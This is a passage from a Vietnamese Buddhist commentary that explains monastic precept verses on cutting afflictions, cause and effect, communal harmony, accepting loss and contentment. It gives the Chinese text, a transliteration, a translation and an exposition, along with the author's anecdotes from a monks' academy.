Người xưa nấu cháo anh lạc”: Trà thô cơm nhạt vốn là bản sắc của người tu đạo. Tương truyền vào triều Tống, Đại học sĩ Phạm Trọng Yêm lúc hàn vi thường đến chùa đọc sách, ăn cơm tự túc. Ông thường nấu một lần cháo chia thành ba phần cho ba bữa và chỉ dùng rau vàng ăn với cháo. Nhân đây giai thoại lịch sử “Đoạn tê họa chúc” (Chia cháo, cắt rau vàng) được lưu truyền. Đó là tinh thần không ngại đạm bạc khiến cho mọi người khâm phục. Trong thiền tông có tổ sư Vĩnh Giác ở núi tu đạo, do tâm chí dồn vào đạo nghiệp nên rất quí thời gian, vì thế ngài dùng rau hoang để cả rể nấu cháo với gạo. Nấu như thế, không dùng dao cắt, cũng không dùng dầu, muối, kết quả thành nồi cháo mà những hạt gạo nằm trên thân rau nhìn rất giống vòng hạt nên gọi là cháo anh lạc, và điều này đã trở thành tấm gương cho người tu hành đời sau.
Đó là những nhân vật điển hình thành tựu trên phương diện học nghiệp và đạo nghiệp, họ đều là những người không cầu kì về ăn, mặt, ở, áo đủ để chống lạnh, thức ăn có thể đỡ đói là được, chẳng chút cầu kì. Chúng ta là người xuất gia tu đạo, phải thường đạm bạc, giữ gìn rỗng lặng mới có thể tiến tu đạo nghiệp. Huống gì, tự mình đã xuất gia không nhất thiết phải chạy theo sự phát triển xã hội, chẳng nên cầu kì trong việc ăn, mặt, ở. Nếu cứ đặt hết tâm ý vào chỗ ấy thì khó giải thoát, nên phải đem tâm an trụ ở đạo nghiệp, mới là đệ tử chân chính của Như Lai. Quí vị tăng sinh! Xin hãy nhớ sáu chữ: “Cam đạm bạc, thủ tịch mặc” (Chịu đạm bạc, giữ yên tịnh).
- Hạnh trừ phiền não
Chữ Hán
出家要斷煩惱,
一了千百俱了,
終朝煩煩惱惱
驢年那得悟道
Phiên âm:
Xuất gia yếu đoạn phiền não
Nhất liễu thiên bách câu liễu
Chung triêu phiền phiền não não
Lư niên na đắc ngộ đạo.
Dịch nghĩa:
Xuất gia phải trừ phiền não
Một hết trăm nghìn đều hết
Trọn ngày phiền phiền não não
Bao giờ mới được ngộ đạo.
Giảng giải
Phiền não là loại bệnh tâm lí rất mệt mỏi, loại bệnh này khiến cho đầu chúng ta không sáng suốt, tinh thần không an ổn. Phiền não tán loạn thì không cách nào vào được đạo. Vì thế, đoạn trừ phiền não là điều căn bản tu đạo, học đạo của người xuất gia.
Căn cứ vào sự phân tích của Duy Thức học, phiền não có sáu thứ Căn bản, tám món Đại tùy phiền não, hai Trung tùy phiền não, mười Tiểu tùy phiền não. Một đời chúng ta bị trói cột bởi những thứ phiền não ấy, khởi niệm mê mờ lệnh lạc, việc làm sai trái mà chuốc lấy thống khổ trong vô biên sinh tử.
Chư Phật, Bồ-tát từ bi, dùng trí tuệ thấy rõ sự nguy hại của phiền não, nên cảnh tỉnh chúng ta tu hành phải lấy việc đoạn phiền não làm trọng yếu; phiền não không đoạn, khó thoát sinh tử, Phật đạo khó thành. Vì thế Tổ sư đã đưa ra điều trọng yếu này.
Phiền não đương nhiên không thể nói đoạn là có thể đoạn được, cần phải hiểu rõ thứ lớp và phương pháp đoạn trừ phiền não, sau đó mới y pháp tu hành, từng bước đoạn trừ. Bát thức qui củ tụng và Ngũ giáo nghi đều có nói rất rõ về nội dung đoạn trừ phiền não. Ngũ giáo nghi cũng nói đến việc đoạn trừ và tu chứng. Người học Đại thừa, Tiểu thừa đều phân thành ba giai đoạn mà thực hành. Để đoạn Hoặc tu chân, Thanh văn thừa dùng sơ phát vô lậu trí mà quán lí Tứ đế, đoạn nhất thiết Kiến hoặc, tức chứng sơ quả là Kiến đạo vị; lại quán lí Tứ đế mà đoạn trừ tất cả tu hoặc, chứng đắc ba quả Dự lưu, Nhất lai, Bất hoàn là Tu đạo vị. Chứng lí đoạn hoặc rốt ráo, lại không còn pháp nào để học là vô học đạo, tức chứng A-la-hán quả. Đó là phần đoạn chứng của người học tiểu thừa. Kiến đạo vị của người học Bồ-tát thừa ở tăng-kì đầu thì hoàn thành đoạn dứt phiền não phân biệt khởi hai chướng sở tri gọi là Kiến đạo, vào Kiến đạo vị là Sơ địa nhập tâm. Từ Sơ địa trụ tâm cho đến đệ thập địa, dần đoạn Câu sinh khởi phiền não hai chướng sở tri mà nhập Tu đạo vị.
Đoạn tận Kiến hoặc, tư Hoặc trong tam giới, lại đoạn tập khí vô minh, đoạn hoặc chứng lí cả hai đều rốt ráo, tức nhập chứng đạo vị mà thành Phật. Đó là pháp của Tam giáo. Nhưng Nhất thừa viên giáo thì nói: Sơ trụ Bồ-tát tức có thể đoạn một phần vô minh, chứng một phần pháp thân. Sự tu hành ở Viên giáo chính là: tu một tức là tu tất cả, đoạn một là đoạn tất cả, chứng một là chứng tất cả. Các giáo phái nói về sự đoạn chứng không giống nhau, đó là theo căn cơ mà nói. Căn cơ tiểu giáo thì nương vào hạnh vị tu hành của tiểu giáo, căn cơ chung giáo thì nương vào hạnh vị tu hành của chung giáo…. Nói tóm lại, đoạn phiền não là nội dung trọng yếu thứ nhất của người tu Phật.
“Một hết trăm nghìn đều hết”: Nếu có thể căn cứ vào giáo lí mà theo thứ lớp đoạn trừ phiền não thì có thể ngộ được “Thật tính của vô minh chính là Phật tính; nơi thân giả tạm chính là pháp thân[23]”. Vạn pháp đều do duyên sinh, nên một hết trăm nghìn đều hết.
“Trọn ngày phiền phiền não não”: Nếu không dụng tâm để đoạn trừ phiền não thì dù cho cạo đầu, đắp y, hiện tướng xuất gia cũng chẳng khác gì người thế tục, trọn ngày cứ bị trói buộc trong phiền não thế thì phải đến năm lừa mới có thể ngộ đạo. Năm lừa tức là không biết đến năm nào, bởi vì trong mười hai chi không hề có mặt con lừa. Điển tích câu này là từ Tổ sư thiền tông ám chỉ cho người đối với việc nào đó mà không có hi vọng. Ngày xưa các thiền sư thường phê bình những người chỉ biết xem kinh mà không biết tham thiền ngộ đạo, thường dùng câu “Lư niên khứ” để châm chích. Truyền đăng quyển 9, chương Cổ Linh ghi: “Toản tha cố chỉ, lư niên xuất đắc”. Nghĩa là người xem kinh chạy theo văn tự mà không biết tham cứu diệu lí thì mãi mãi không thể đoạn phiền não và rốt cục không có hi vọng ngộ đạo. Do đó, Thiền sư mới ám chỉ những ai không biết tham thiền thì nói là năm lừa mới được ngộ đạo. Kì thật không có năm lừa, cũng chính là nói người ấy một đời cũng chẳng thể ngộ đạo.
Từ qua Bát thức qui củ tụng và Ngũ giáo chương, chúng ta hiểu về phiền não và phương pháp đoạn trừ, có thể đoạn trừ hay không thể đoạn trừ phiền não hoàn toàn do chính mình. Kinh Viên giác nói: “Không sợ niệm khởi, chỉ sợ chậm giác ngộ[24]”. Niệm chính là vọng niệm phiền não, không sợ vọng niệm sinh khởi, chỉ cần chúng vừa sinh khởi thì chúng ta kịp thời phát hiện không để nó phát sinh tác dụng. Đó chính là biện pháp tốt nhất để đoạn phiền não. Hi vọng đại chúng thường đề khởi thoại đầu, luôn luôn thấy được sự sinh khởi của phiền não. Đó là phương tiện tốt để chặn đứng phiền não. Chúng ta hãy thử làm xem.
- Hạnh hiểu rõ nhân quả
Chữ Hán
出家要明因果
粒粒施主辛苦
吃了若不修行
做牛做馬還補
Phiên âm
Xuất gia yếu minh nhân quả
Lạp lạp thí chủ tân khổ
Ngật liễu nhược bất tu hành
Tố ngưu, tố mã hoàn bổ
Dịch nghĩa
Xuất gia phải rõ nhân quả
Hạt hạt thí chủ khó nhọc
Nếu ăn mà chẳng tu hành
Làm trâu, làm ngựa đền nợ.
Người học Phật chúng ta, điều trọng yếu là phải rõ nhân quả. Suốt cả quá trình khi chúng ta bắt đầu học theo Phật cho đến khi thành tựu đạo nghiệp chưa từng lìa nhân quả. Kinh Hoa nghiêm phần thứ hai nói rõ về việc tu nhân khế quả. Do đó có thể biết nhân quả là vấn đề trọng tâm của Phật giáo. Phật giáo lấy nhân quả làm tông, vì thế Tổ sư nêu lên hạnh này.
Nhân là nguyên nhân (chủng tử) quả là kết quả. Nếu muốn được một kết quả tốt đẹp, trước tiên phải tuyển chọn những hạt giống, đem hạt giống gieo ở vùng đất thích hợp để nó tuần tự phát triển: nảy mầm, vươn cành, nở hoa, kết quả. Trong quá trình trưởng thành ấy, tuy trên tướng trạng có muôn vàn sai khác nhưng về bản chất là bất biến. Vì thế gọi là “nhân cai quả hải, quả triệt nhân nguyên”, có nhân như thế thì sẽ được quả như thế. Do đó, sự tu hành của Bồ-tát không cần nghĩ đến kết quả như thế nào mà chỉ đặc biệt chú trọng tu nhân như thế nào, nên nói: “Bồ-tát sợ nhân”. Chúng sinh lại không biết đạo lí ấy để gieo nhân lành, mà lại phát triển một cách tùy tiện, một ngày kia đã tạo nhân ác, gặp kết quả bất như ý thì đau khổ không chịu nổi, hối chẳng kịp, đó tức là: “chúng sinh sợ quả”.
Trong sinh hoạt hằng ngày của chúng ta, không nên chỉ biết giữ lấy sự ăn mặc tiền tài vật chất mà phải coi trọng nhân quả, cho đến một niệm khởi lên, một hành động đều phải coi trọng nhân quả. Một người phải hay không phải là bậc chính nhân quân tử, được mọi người hoan nghinh phụ thuộc vào dụng tâm của người ấy chánh hay bất chánh. Trên thế giới có rất nhiều người trí thức thông minh, họ cho rằng phải giở thủ đoạn, phải dùng thế lực, phải cầm nắm thế lực, đó là con đường ngắn nhất để được mọi người ủng hộ. Song hoàn toàn bất ngờ, dùng thủ đoạn, nắm bắt quyền thế làm yếu tố chính để tập hợp quần chúng, đó là kiến lập một quan hệ sống còn, như thế vô cùng bất ổn. Ngược lại nếu dùng nhân cách chân thành, đạo đức mà chăm sóc mọi người, chẳng khởi một ý niệm để sau người ấy báo đáp. Hình thành trên nền tảng chân thành ấy là kiến lập trên sự cảm tình, đạo nghĩa, như thế mới là chắc thật. Sự kết hợp quần chúng như thế là mối quan hệ thân thuộc tự nhiên, có thể nhận biết rõ ràng.
Thành công hoặc thất bại chỉ ở trong một niệm đầu tiên. Cổ đức nói: “Từ nhân không ngay thật mà gặp kết quả quanh co[25]”. Kết quả tốt cần phải bắt đầu từ sự chăm bón hạt giống tốt. Đó là định luật nhân quả.
“Hạt hạt thí chủ khó nhọc”: Nhu cầu sinh hoạt hằng ngày của chúng ta đều nhờ vào tín thí mười phương cúng dường, bởi chúng ta không lo việc sản xuất, không cày bừa mà có ăn, không dệt mà có mặc. Ăn uống bất quá chỉ là một phần trong nhu cầu sinh hoạt, nhưng thật ra nó cũng đại biểu cho tất cả. Ngay lúc chúng ta ăn uống, mỗi một hạt cơm có được ngày hôm nay là nhờ công khó khổ của người thí chủ. Cổ đức có bài thơ cảm niệm về công khó khổ của người nông phu như thế này:
Cày bừa dưới ánh nắng trưa
Mồ hôi tuôn chảy như mưa xuống đồng
Bữa cơm người có biết không
Mỗi hạt khó nhọc nhờ nông phu làm[26].
“Nếu ăn mà chẳng tu hành
Làm trâu làm ngựa đền trả”: Chúng ta người xuất gia tu hành, nhận sự cúng dường của tín thí thì phải biết tu hành cẩn trọng. Chúng ta tu hành thí chủ mới cúng dường cho chúng ta, vì họ mong được có chút công đức nhờ vào ruộng phúc của chúng Tăng. Chúng ta đã tiếp nhận sự cúng dường thì không nên cô phụ họ, hẳn phải thời khắc không quên tu tập và cũng chỉ có không quên tu hành mới có thể bất động trước niệm thị phi, thấy được những ý tưởng bất chính của mình và người. Người xuất gia thời thời khắc khắc cẩn trọng dụng công, như thế mà còn sợ không kịp, đâu thể công phu nhàn rỗi, ưa tranh thị phi nhân ngã? Nếu không nghĩ đến tu hành, chuyên tâm nơi đạo nghiệp mà chỉ nghĩ đến làm sao có được lợi dưỡng, tiếng thơm thì sợ rằng đời sau sẽ làm trâu, làm bò trả nợ thí chủ đã khó nhọc cúng dường. Vì thế nói: Bạn đã nhận sự cúng dường của mọi người mà không có cách nào thay người làm tiêu tai chướng tăng phúc thọ, thì đời sau phải làm trâu, làm ngựa để đền trả sự khó nhọc của mọi người.
Cổ đức có bài kệ sách tấn:
Một hạt gạo thí chủ
Lớn như núi Tu-di
Nếu không thể ngộ đạo
Mang lông, đội sừng trả.
Bài kệ này cũng mang tư tưởng ấy. Chúng ta có cơ duyên được xuất gia, thường cầm kinh Phật, đối diện tượng Phật, được như thế là đã trải qua nhiều đời nhiều kiếp thường vun trồng thiện căn mới có; cần phải nắm giữ cơ hội tốt này, đặt sự tu hành đạo nghiệp làm việc trọng yếu nhất, trừ sạch tâm vị kỷ, vọng tưởng. Bởi vì dù cho một người có danh lợi lớn đi nữa cũng là khó thoát khỏi ải sinh tử. Chúng ta hẳn nhiên từ kinh Phật đã rõ chân lí này thì nên buông bỏ tâm danh lợi, đề khởi chính niệm, tu học Phật đạo mới đúng.
- Hạnh hòa đại chúng
Chữ Hán
出家要和大眾,
慎勿互相爭鬨。
聚頭說是說非,
空把光陰來送。
Phiên âm:
Xuất gia yếu hòa đại chúng
Thận vật hỗ tương tranh hống
Tụ đầu thuyết thị, thuyết phi
Không bả quang âm lai tống.
Dịch nghĩa:
Xuất gia phải hòa với chúng
Chớ kình chống nhau ầm ĩ
Chụm đầu nói chuyện thị phi
Thời gian trôi qua vô ích.
Giảng giải:
Chúng ta đã xuất gia, lại có cơ duyên tu học cùng một chỗ, thì chẳng khác gì một gia đình. Đức Phật vốn chế ra sáu pháp hòa kính là để áp dụng trong sinh hoạt hằng ngày của chúng ta. Hòa hợp ở một chỗ không chỉ khiến cho chúng ta càng thăng tiến trong đạo nghiệp, học nghiệp mà còn khiến cho đại chúng an tâm tu hành. Chữ ‘tăng’ trong tăng đoàn Phạn ngữ gọi là ‘tăng già’ dịch ra chữ Hán là hòa hợp. Có thể sống với nhau hòa hợp, thực hành sáu pháp hòa kính của Phật chế. Đó là nguyên tắc sống với đại chúng.
Sáu phép hòa kính:
- Ở chung một chỗ hòa hợp: đại chúng cùng ở một chỗ, như ở cùng phòng, dùng chung giường, tòa…Tâm lí của phàm phu là muốn tìm một chút thoải mái, một chút tiện nghi, một chút tốt đẹp nhưng những đồ vật do thường trụ chuẩn bị có thể đủ sử dụng giúp cho đời sống sinh hoạt của mình. Như học viện chúng ta xây dựng trong khi kinh tế khó khăn, phòng ốc vừa mới lợp xong, thiết bị chưa hoàn chỉnh, đạo sư Nam Công đề xuất dạy học. Đúng với ý nguyện nhiều năm của tôi, chuẩn bị chưa đến một tháng thì bắt đầu dạy học. Hòa thượng Trí Quang nhặt lấy những chiếc giường hai tầng của học sinh công thương loại ra. Những chiếc giường này đều bằng gỗ, bởi thời bấy giờ không phải là thời đại công nghiệp phát triển như hiện nay, giường đa phần làm bằng gỗ. Và còn phải dùng giường hai tầng là bởi phòng không được rộng, vì thế khi ngủ có một hai vị cảm thấy không thoải mái, còn tất cả đều thông cảm cho hoàn cảnh của trường. Sau đó, giường cũ cũng hư hoại và trường cũng dần dần đóng thêm những chiếc giường mới. Vốn là có thể thay đổi mới toàn bộ, nhưng giường còn dùng được mà bỏ đi thì quá tiếc vì thế để cho các tăng sinh chịu khổ một chút.
Hiện nay đã cải đổi rất nhiều, ngày xưa là phòng chung, bây giờ đổi thành từng phòng riêng mà lại có thêm giường mới, nhưng do vì có giường mới, giường cũ, nên mọi người đều thích giường mới, vì dễ chịu hơn; song tư tưởng đó thoáng hiện rồi dừng mà hoàn toàn chưa từng có ai tranh giành giường mới để xảy ra việc không bằng lòng hay khó xử. Những người được mời làm chức sự vẫn ngủ trên những chiếc giường cũ.
Người có thể ở chung mà trên phương diện sinh hoạt không tính toán, sử dụng phương tiện mà thường hỏi lại lòng mình và vì sở thích của người khác, thì có thể an nhiên vô sự.
- Hòa hợp không tranh cải.
Người học Phật tu đạo, ở nơi nghiệp miệng, tốt nhất là không nói lời vô nghĩa, không nói lời tổn hại người khác, không đặt điều thị phi, không cả tình thêm bớt.
Có lúc tôi gặp và phát hiện hai vị tăng sinh ở một nơi nào đó nói chuyện riêng tư; vấn đề chúng ta cần bàn luận là học nghiệp và đạo nghiệp, nếu khác đi thì không nên nói, cho đến bàn luận chuyện thị phi nhất định phải phê bình. Hi vọng Tăng sinh chúng ta có quan niệm phân định thị phi và tập thành thói quen loại bỏ thị phi. Tốt nhất là nên xa lìa những người thích bàn luận chuyện thị phi. Đó gọi là: thị phi trọn ngày đều có nhưng nếu chẳng nghe thì thành không. Nghe những điều thị phi vô ích ấy chỉ khiến cho quí vị thêm phiền não, có một trăm thứ tổn hại mà chẳng có chút lợi ích, nên tôi không thích để mọi người nói chuyện thị phi.
Nhiều năm nay tại Liên Xã đều áp dụng một quan điểm lập luận chính đáng với mọi người, tức là Phật đường là nơi dùng để cho mọi người tu tập đạo nghiệp, giải thoát phiền não, hoàn toàn chẳng phải chỗ dùng để bàn luận chuyện thị phi. Do đó có tín đồ nói với tôi: “Sư phụ! Có người ca ngợi ngài”. Tôi nói: “Không có chuyện đó, không dám”. Nếu nói: “Sư phụ! Có người phê bình ngài” thì tôi nói: “Không vấn đề gì, ai cũng muốn phê bình mọi người, tôi cần phải tự mình kiểm điểm”. Con người không thể làm vừa lòng được một người, huống gì là tôi đang quản lí Tăng sinh. Quê tôi có câu tục ngữ thế này: “Quản lí ba ngày con chó cũng ghét”. Bởi vì người ấy ở mọi nơi luôn cẩn thận, đặt trách nhiệm lên trên, không lợi dụng tiền bạc của người khác để tạo cảm tình, đương nhiên khó tránh khỏi sự bất mãn của một số người
Vì thế chúng tôi chỉ cần đứng thẳng, hỏi lòng không thẹn thì chẳng cần sợ bất cứ lời phê bình nào. Khẩu nghiệp trong mười thiện nghiệp có đến bốn điều, cho nên có thể thấy tính cách trọng yếu của nó. Hi vọng mọi người chú ý tu khẩu đức, không những không nói lời tổn thương người khác mà còn tích cực sử dụng ngôn ngữ hòa hợp. Không bới móc vết xấu của người, lại có thể hòa giải sự phân tranh của người khác, đối đãi với mọi người một cách độ lượng.
Lấy phương châm này mà xử sự với mọi người thì sợ gì người khác phê bình. Huống gì cổ đức có dạy: “Nghe lỗi của mình thì vui mừng, nghe lỗi của mình thì bái tạ” thật nên học tập. Con người chẳng phải là thánh hiền thì làm sao không lỗi, nghe người khác chỉ lỗi cho mình thì cần phải tiếp nhận một cách vui vẻ, cám ơn người tạo nên nhân duyên để ta xét lại mình. Trăm nghìn lần đừng mang tâm lí oán hận báo thù, nếu không như thế thì thị phi bắt đầu kéo đến, khiến cho mọi người thân tâm bất an, đó không phải là thái độ của người tu hành.
- Cùng chung sự thấy biết:
Phật giáo tuy có nhiều tông phái khác nhau nhưng đều lấy việc tu đạo Bồ-tát, thành tựu Phật quả làm mục đích, chẳng có thái độ mình đúng người sai, tự có tâm lí cho rằng mình cao hơn người, mà phải nên cùng đại chúng có kiến giải đồng nhau, không nêu bày ra điều mới để lập dị, biểu hiện thái độ ngang bướng. Phải biết rằng, Đức Phật từng dạy: “Có nhiều phương tiện khác nhau, qui cùng chẳng khác đường”.
- Ý hòa cùng vui.
Đó là tu hành trên phương diện tâm lí. Mọi người cùng ở một nhà, anh em nên thương yêu kính nể lẫn nhau, phải biết rằng có duyên mới cùng ở tại một chỗ để tu học, phải nên quan tâm, săn sóc lẫn nhau, nghìn vạn lần không nên tùy tiện phát ý chống trái nhau.
- Giới hòa cùng tu: Đã cùng tu trì giới cấm của Phật chế, thì không phân biệt bỉ thử cao thấp, Bồ-tát đều phải tuân theo giới luật Phật chế, huống gì Tì-kheo, Tì-kheo ni? Giới là phép tắc khuôn mẫu sinh hoạt của đại chúng, không có phân biệt xem nhẹ một điều giới luật nào. Giới chính là pháp luật duy trì trật tự trong tăng đoàn, mỗi người phải tuân thủ nguyên tắc cọng đồng một cách vô điều kiện.
- Lợi hòa cùng chia.
Ở trong Tăng đoàn khi có thí chủ cúng dường thường trụ thì phải để người chủ sự phân phối đồng đều, không nên biểu hiện thái độ tham nhiều chê ít.
Mỗi cá nhân thường làm được sáu điểm trên, thì có thể cùng đại chúng hòa hợp ở một chỗ, vì thế, Tổ sư lấy việc hòa hợp đại chúng làm điều trọng yếu thứ mười tám của người xuất gia.
“Chớ kình chống nhau ầm ĩ”: Nhân nơi bất hòa mà kình chống nhau, đại chúng cùng ở một chỗ nên có sự kình chống phát sinh, thì rất dễ tổn thương hòa khí của đoàn thể. Người nặng tâm tự lợi, tự cho mình là tuyệt vời, đó đều là tâm thái của phàm phu, cũng chính là ngòi nổ của sự đấu tranh. Chúng ta nếu muốn an tâm tu hành để thành tựu đạo nghiệp, tiến đến mục đích tối cao siêu phàm nhập thánh, chuyển mê thành ngộ thì phải tu tập sáu pháp hòa kính, ngăn chặn sự đấu tranh, tôn trọng lẫn nhau, hòa hợp cùng ở một chỗ.
“Chụm đầu nói chuyện thị phi
Thời gian trôi qua vô ích”: Đó là một tật mà nhiều người thường phạm. Hai ba người rảnh rang ngồi lại thảo luận về những vấn đề quan trọng thì rất ít mà nói chuyện thị phi thì rất nhiều. Người có đạo tâm chân chính thì rất quí thời gian. Thời gian để mình tu học, hành đạo không có nhiều, không kịp thì làm gì có thời gian để nói trường nói đoản? Huống gì là nói chuyện thị phi tẻ nhạt chẳng chút liên quan, chỉ tổn thương tình cảm, gây động phiền não, đối với đạo nghiệp tu học không chút lợi ích? Hi vọng đại chúng chú ý, cố gắng không nói chuyện thị phi. Nếu không, tâm thị phi quá nặng thì để thời gian trôi qua vô ích, tuy đã xuất gia, được vào học viện, đứng trong hàng ngũ tăng đoàn cũng chẳng thể học được điều gì, như thế chẳng đáng tiếc sao?!
Nên biết còn có bao nhiêu người ở ngoài học viện, không có cơ hội học hỏi. Nay chúng ta may mắn có duyên xuất gia, đến đâu cũng được mọi người cúng dường, lại có cơ hội để học tập thì phải nên tu học thật tốt mới không cô phụ tâm xuất gia ban đầu và bản nguyện phát tâm cầu học. Hi vọng mọi người thường lấy điều này răn nhắc lẫn nhau. Cổ nhân nói: “Lúc thiếu niên chớ để thời gian trôi qua vô ích, đến khi bạc đầu mới khóc cho sự trông rỗng của mình[27]”. Câu này thật đáng để chúng ta cảnh tỉnh.
- Hạnh chịu thiệt
Chữ Hán
出家要吃些虧,
又要帶三分呆,
心似寒灰枯木,
是非從何處來。
Phiên âm
Xuất gia yếu cật ta khuy
Hựu yếu đái tam phân ngai
Tâm tợ hàn khôi khô mộc
Thị phi tùng hà xứ lai.
Dịch nghĩa:
Xuất gia phải chịu thiệt thòi
Lại nên giữ ba phần ngốc
Tâm như tro lạnh cây khô
Thị phi từ chỗ nào đến!
Giảng giải:
Người ta thường nói: “Chịu thiệt chính là chiếm lợi thế”, nhưng đa phần mọi người đều không muốn chịu thiệt mà muốn có lợi thế. Đó là nhược điểm lớn của tâm ích kỷ ở con người. Đối với người học Phật chúng ta thì cần phải thường chịu thiệt, bởi vì học Phật để cứu giúp chúng sinh, ý nghĩ muốn tranh dành lợi thế với chúng sinh thì làm sao có thể độ họ? Nhất là sinh hoạt ở trong đoàn thể, những công việc vất vả người khác đều không muốn làm thì ta làm. Những việc đưa đến danh lợi mọi người tranh làm thì ta tình nguyện nhường người ba phần. Đó gọi là chịu thiệt.
Nhưng có khi không nhất định làm như thế là chịu thiệt. Trên thực tế đó cũng là một sự khảo nghiệm lớn của cuộc sống. Trong Cáo tử thiên, Mạnh Tử nói: “Trời sắp giao trọng trách cho người ấy thì trước phải làm cho cơ thể người ấy đói khát, khổ tâm trí, nhọc gân cốt ” thì người ấy mới có thể gánh vác được trọng trách quốc gia, xã hội. Không kể gặp sự khó khăn gian khổ nào, đều nên không một lời oán than. Chúng ta có tư tưởng như vậy không? Làm người quản lí, hay cha mẹ, sư trưởng, phải mong muốn cấp dưới, con cái, đệ tử của mình có sự thành tựu, không nên giữ thái độ khinh thường họ, vì đó không phải là sự yêu thương, chỉ có hại mà thôi. Vị nào thật sự thương yêu cấp dưới, con cái, đệ tử thì thường vun bồi cho họ ý chí kiên cường, độc lập, khắc khổ, nhẫn nại, không ngại đối với họ nhận một chút thiệt thòi về mình, thường xuyên rèn luyện họ. Chỉ có người đã trải qua sự rèn luyện mới có thể làm được việc lớn, thành tự sự nghiệp lớn.
Như vua Thuấn là người con hiếu hạnh, gặp người mẹ kế tệ ác khiến ông ăn không nó, mặc không ấm, phải làm nhiều việc khổ nhọc, nhưng ông vẫn cam chịu, không một lời than oán. Một hôm, cha ông là vua Nghiêu thấy ông mặc áo mỏng xấu mà trách người vợ kế. Thuấn liền quì xuống trước cha đỡ lời cho mẹ kế: “Xin cha chớ trách dì, vì em con nhỏ tuổi, thân thể yếu đuối nên cần phải có áo gấm đủ ấm. Con tuổi đã lớn, có sức mạnh nên không cần dùng nó”. Vua Thuấn lúc bé có thể chịu thiệt, không một lời than oán, lại còn có tâm tha thứ cho mẹ kế của mình, dạng người như thế quí hiếm khó có. Vì thế, ông không những cải đổi được tâm riêng tư của người mẹ kế mà sau này trở thành một vị vua anh minh, lưu tiếng thơm nghìn đời. Từ chuyện cổ này có thể biết chịu thiệt chẳng phải không có giá trị. Hằng ngày, chúng ta làm người cần phải học theo đức hạnh này của bậc thánh nhân xưa để phá trừ tâm bệnh hoạn tư lợi un đúc từ vô thủy kiếp đến nay là ưa chiếm lấy ưu thế, thích hưởng thụ thành quả.
“Lại nên giữ ba phần ngốc”: ý là phải tập tính khiêm cung nhường nhịn, không cùng người tranh tốt xấu, tính hơn thua, thành tâm thành ý giữ mình an phận. Thường tu dưỡng như thế, thành công nhất định thuộc về quí vị.
“Tâm như tro lạnh cây khô”: Con người sở dĩ không buông bỏ được mọi việc là bởi chạy theo hư danh, hiếu thắng. Nếu có thể trừ bỏ những tâm lí bất chính ấy thì trong sự tu hành sẽ đạt được trạng thái đối cảnh mà tâm không vọng khởi; tâm như tro tàn, không bị chúng thiêu đốt, cũng như cây khô không thể đâm chồi. Tu dưỡng đến cảnh giới ấy, vọng niệm đã bị tiêu diệt, tự nhiên vô minh phiền não, danh lợi, hiếu thắng không còn sinh khởi, và tất nhiên người ấy đang đi đến chỗ thành tựu đạo nghiệp.
“Thị phi từ chỗ nào đến”: Có thể tu tập được như trên thì không tranh với đời, mọi nơi đều khiêm nhượng thì thị phi không còn sinh khởi. Thị phi sinh khởi chỉ do tự cho mình đúng, còn người khác sai, tổn người lợi mình, không nhường nhịn nhau, chúng ta nếu muốn trừ hết những phiền nhiễu thị phi thì phải dụng tâm tu tập điều này. Đồng thời cần phải hiểu rõ, ở trong một đoàn thể, nếu đã có chuyện thị phi thì đại chúng không an tâm tu học hành đạo. Vì thế, không chỉ phải chú ý sự tu dưỡng của chính mình mà đồng thời cũng phải tránh đưa chuyện thị phi ra đại chúng. Cổ đức từng dạy: “Thà động nước nghìn sông, chớ động tâm đạo nhân[28]” tức là ý này. Khuấy động nước của nghìn sông chẳng có tác hại gì nhưng nếu khuấy động tâm của đạo nhân thì tội ấy rất lớn, bởi không chỉ làm tổn giảm đức hạnh của mình mà còn làm trở ngại sự tiến tu của người khác. Vì thế, điều này là điều thiết yếu cho sự hòa hợp đại chúng, là một nguyên tắc chuẩn nhằm kiến lập tâm lí khi ở cùng đại chúng và cũng là một sự tu dưỡng cao độ cho chính mình. Hy vọng đại chúng chú ý học tập.
- Hạnh tri túc
Chữ hán:
出家要常知足
莫管衣衫淡泊。
若想他人財物
不顧自己福薄
Phiên âm:
Xuất gia yếu thường tri túc
Mạc quản y sam đạm bạc
Nhược tưởng tha nhân tài vật
Bất cố tự kỷ phúc bạc.
Dịch nghĩa:
Xuất gia phải thường tri túc
Chớ hiềm áo mỏng đơn sơ
Nếu muốn tài vật của người
Là quên chính mình phúc mỏng.
Giảng giải:
‘Tri túc’: Mọi người đều biết từ này, nó là điều mà người Trung Quốc đặt biệt chú trọng tu dưỡng trong cuộc sống. Lúc Đức Phật còn tại thế, cũng thường đưa ra vấn đề này. Người dân ở Trung Quốc thường lưu truyền hai câu: “Biết đủ thường vui, nhẫn được thì an”. Rất nhiều người đã lấy điều này để nhắc mình và đã tự làm đoan chính phẩm đức của mình. Tri túc là biết đủ, biết đủ dục vọng của chúng ta. Dục vọng là bao quát thức ăn, vật mặc, các phương tiện sinh hoạt… Dục vọng không đứng một chỗ: lúc không có phòng ở thì muốn có chỗ đơn sơ là tốt, khi đã có rồi thì mong được một nếp nhà tranh, khi có nhà tranh lại mong có nhà ngói, rồi mong có nhà lầu… Dục vọng từng bước lên cao, không chịu dừng lại, và dù cho có ở nhà lầu cũng không biết đủ ở đó. Sử dụng đồng tiền cũng thế: Không có tiền thì mong được có tiền, tưởng tượng có tiền là rất tốt; có tiền ít thì mong có nhiều, khi có nhiều lại mong có nhiều hơn, lòng tham không biết chán. Áo quần cũng như thế: có áo xấu mong được áo đẹp, có áo đẹp lại mong đẹp hơn… Trên thực tế thì đó đều là những dục vọng bất hợp lí. Tác dụng của áo quần là để thân thể được kín đáo, che chắn nóng lạnh, mặc thấy dễ nhìn là được, ăn uống để trị đói, giải khát là tốt, ở phòng có thể tránh được gió mưa, ngăn trùng, rắn độc là được, tiền bạc có dùng là tốt, đâu cần phải tham nhiều.
Mỗi người đều thường dụng tâm truy cầu vật dục thế thì “tâm vi hình dịch” nghĩa là tâm của chúng ta bị thân thể bắt làm nô lệ, mỗi ngày từ sáng đến tối vì nó mà bận rộn, ném phần lớn thời gian vào việc này. Nghĩ sâu một chút thì điều đó thật là một sự tổn thất, lãng phí chẳng thể bù đắp. Nếu như đem tâm ấy mà hướng về sự tu học thì nhất định sẽ thành tựu. vì thế Tổ sư dạy chúng ta phải thường tri túc.
